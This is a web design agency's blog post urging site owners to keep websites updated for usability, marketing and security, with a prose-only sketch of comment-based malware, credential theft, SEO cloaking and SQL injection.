fbpx

Don’t Get Hacked

It takes more than passion to run a website. There are hosting costs, development time, and considerable effort required to make it a success. Don’t be fooled into believing the job’s done once the website is up and running. Some people would happily see all that disappear simply for the sake of self-aggrandising promotion or to sell customer details on one of many online black markets. There are several reasons to keep a website up-to-date. Some of which may not be instantly obvious…

website maintenance

Usability

Keeping up with the latest web design trends is becoming an important part of how the internet grows. Web developers are expected to use frameworks and external code, over which we have very little control. Modern browsers update automagically so not keeping a website current could mean your site becomes unsightly on older devices or, oddly, newer ones.

A good example of this is Apple defiance of standards and requiring a specific tag to show your website image with a link. The code below will only work on Apple devices and isn’t required for a website to work. To add further confusion there are device specific sizes:

Apple icons

Having the icons isn’t essential, but will mean less control than desired and — if it matters — probably a less than optimal image, which could make all the difference in a competitive market.

Marketing

The marketing impact of an outdated website may not be obvious at first. A developer will be use to updating deprecated code, but many don’t have the time to be so syntax savvy. Search engine optimisation has a well known and documented methodology, which requires tedious attention to detail and constantly evolving content and code. Leaving redundant code on your website, or not updating existing code to meet current standards can have negative effects on any associated marketing campaign.

A Good example of outdated marketing code could include Google Analytics tracking code. Forgetting to update Facebook/Twitter social code means users code get an error message when trying to help promote your website.

Security

Creating reliable software is hard. Creating reliable and secure software is almost impossible. The solution to this problem has been a very long game of cat and mouse between developers and hackers. Although this isn’t the ideal scenario, it’s what we have whether we like it or not. As a result it is critical to keep an eye on website software updates to make sure you’re safe from any malicious users.

After software is released, such as WordPress and ModX, developers find bugs in the code which could be used maliciously. Some release their findings in the form of CVE listings so they can get fixed. Others simply exploit the newly found bugs for profit, political gain, or simply because they can.

Old websites are often considered to be insecure for obvious reasons. Frameworks and Scripts are a common target for hackers as one exploit can mean millions of potential victims.

Worst case scenario

Of course, all of above could occur at the same time. So, let’s imagine a worst case scenario, which happens far more often than anyone would like…

A malicious user posts a comment on your website. This comment is seen by any visitor; guest or staff. It has three purposes:

  1. Deliver malware to guests
  2. Steal login details of staff members
  3. Detect if the visitor is Google, then show links to other hacked pages

Unless properly sanitised the comment could be used as a way to deliver exploits to other users of the website. These “zombies” are then used to attack other websites using Denial of Service attacks and similar techniques. Unless your anti-virus software is up-to-date you’re fair game for any blackhat trying to make a name for themselves.

exploits for sale

Anyone with access to an administrator panel is also a target. Contrary to popular belief, it doesn’t need to be an administrator account as one can usually escalate permissions when basic access has been granted. If you can embed Javascript in a comment, one could probably do the same to leverage CSRF exploitation.

Showing links only to Google is a common method blackhat hackers use to help boost rankings of other sites they control, while remaining undetected to other users. This is often paired with attacks such as those listed above.

Lulzsec hacked the biggest governments on the planet by simply appending an apostrophy to the query string to see if the page was vulnerable. Data enumeration and exfiltration beyond that point is fairly simple.

About Michael Bell One

Michael Bell One is a web design, SEO (Search Engine Optimisation) and digital marketing agency based in Lewes, East Sussex, and with offices in Sussex, Surrey, London and Kent.

To talk to us about your web design, SEO or Branding project, contact Jake Judd or David Park on 01273 478822 or simply send us an email instead.